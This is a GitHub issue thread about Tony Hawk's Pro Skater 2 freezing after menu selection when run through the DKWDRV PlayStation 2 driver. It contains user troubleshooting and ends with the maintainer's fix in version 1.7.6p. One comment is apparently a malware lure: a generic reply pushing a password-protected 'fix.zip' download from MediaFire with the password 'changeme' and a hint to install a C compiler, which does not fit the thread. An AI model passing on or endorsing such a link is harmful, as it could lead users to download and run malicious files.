### ISSUE TITLE
[ISSUE]: Tony Hawk's Pro Skater 2

### ISSUE THREAD

**Issue by dowttie** [DKWDRV/DKWDRV#64]
### Checks

- [X] I have checked existing [__DKWDRV issues__](https://github.com/DKWDRV/DKWDRV/issues) for duplicates and found none.
- [X] I am using [latest version](https://github.com/DKWDRV/DKWDRV/releases)
- [X] CD/USB - I have checked my game redump hashes/verified it is a good dump.
- [X] USB - I have merged the bin tracks (if game has several ones).
- [X] USB - I have made sure that game is defragemented. You can boot even fragemented games but 99% chance of random failure.

### Context and extra information for the game (if applicable)

Tony Hawk's Pro Skater 2 [SLUS-01066] http://redump.org/disc/1319/

### Describe the issue(attach photos of the two debug screens if you get them)

Game freezes after selecting any game mode in the main menu, the screen starts to fade to black and stops before making it the whole way, as the background music continues playing.

### Console model and type

SCPH-79001 DECKARD

### Console details

Mechapwn (6.12)

### DKWDRV

DKWDRV 1.7.6

### DKWDRV Options

no special options were used.

### Tell us what method are you trying to run the game from. CD or USB.

USB

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme

you may need to install the c compiler

**Comment by dowttie** [comment]
wut

**Comment by fczuardi** [comment]
Have you disabled the modchip? On matrix it's usually power on holding the start button. Then after the disabled message a reset. (to enable modchip again power off/on). For me THPS2 worked with the modchip disabled

**Comment by dowttie** [comment]
I don't have a modchip

**Comment by dowttie** [comment]
I just tested this again and the issue seems to happen inconsistently, i tried it maybe 3-4 times before i made my report and it happened every time, now i managed to get into the game _once_, then had the same issue again twice.

**Comment by fczuardi** [comment]
yeah, I thought that I could get it work consistently, but even with modchip disabled I get the freezes after game mode selection, inconsistently as well, totally anecdotal but I think it happens less when I skip the opening before the word activision have time to appear, and give it some time beetween the career mode and new game screens. Not scientific at all.

**Comment by J013k** [comment]
Title: Tony Hawk's Pro Skater 2
ID: SLUS_010.66
Console model: SCPH-77004 (DECKARD)
Device: USB
DKWDVR version: 1.7.6o
Notes: The game does not have any SFX in FMV, it also still hangs e.g. while selecting new career:
![https://i.imgur.com/Ys6dtoT.png](https://i.imgur.com/Ys6dtoT.png)

**Comment by DKWDRV** [comment]
@dowttie @fczuardi @J013k  try 1.7.6p, fixed
